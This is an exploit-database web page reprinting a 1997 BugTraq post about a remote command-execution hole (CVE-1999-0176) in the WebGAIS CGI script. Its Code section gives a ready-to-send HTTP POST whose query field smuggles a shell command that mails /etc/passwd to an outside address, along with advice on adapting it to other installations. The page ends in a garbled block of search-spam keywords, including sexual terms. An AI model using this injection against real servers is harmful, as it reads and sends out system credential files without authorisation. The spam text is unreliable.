exploits , vulnerabilities , articles , WEBgais Remote Command Execution Vulnerability
| Title |
WEBgais Remote Command Execution Vulnerability |
| Published |
1997-07-10-12:00AM |
| Updated |
1999-06-01-12:00AM |
| Class |
Input Validation Error |
| CVE |
CVE-1999-0176 |
| Remote |
Yes |
| Local |
Yes |
| Credit |
Posted to BugTraq on July 10, 1997 by Razvan Dragomirescu < drazvan@kappa.ro > |
| Vulnerable |
WebGAIS Development Team WebGAIS 1.0 B2
WebGAIS Development Team WebGAIS 1.0 B1
WebGAIS Development Team WebGAIS 1.0 |
| Not Vulnerable |
|
| Code |
Exploit details taken directly from the BugTraq post By Razvan Dragomirescu:
telnet target.host 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
query=';mail+drazvan@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
[...] But to make it work for your system too, you'll have to add other parameters, like idx_dir and data_type who are required by the script in its original version. Just make a normal query to your WebGais server and see what all the parameters are. But remember to use "output" and "domain" as specified in my exploit. Otherwise you will end up in some other place of the script and nothing will happen.
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 04 Dec 2008 20:41:31 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t212t all cartoo t734t t881t all cartoo thgjjh clip 3gp. all cartoo nudedesigi f a r i d macking it all cartoo nero-6.6.1 all cartoo all+cartoo all cartoo t972t bbc+urdu+. ////compon mdkhacks.c all cartoo nero-6.6.1 t935t all cartoo Shakeelaph Guild bank SCANDAL t935t all cartoo nag Hot girls punphp 89.sex.co . www.bideos nag VMware 5.0 BANDUNGSEX web mail h Pectuer t167t www.nayant t972t MASTIMOVIE t603t vedioporno t882t ODI SAKEELA.LK siswi porn
|
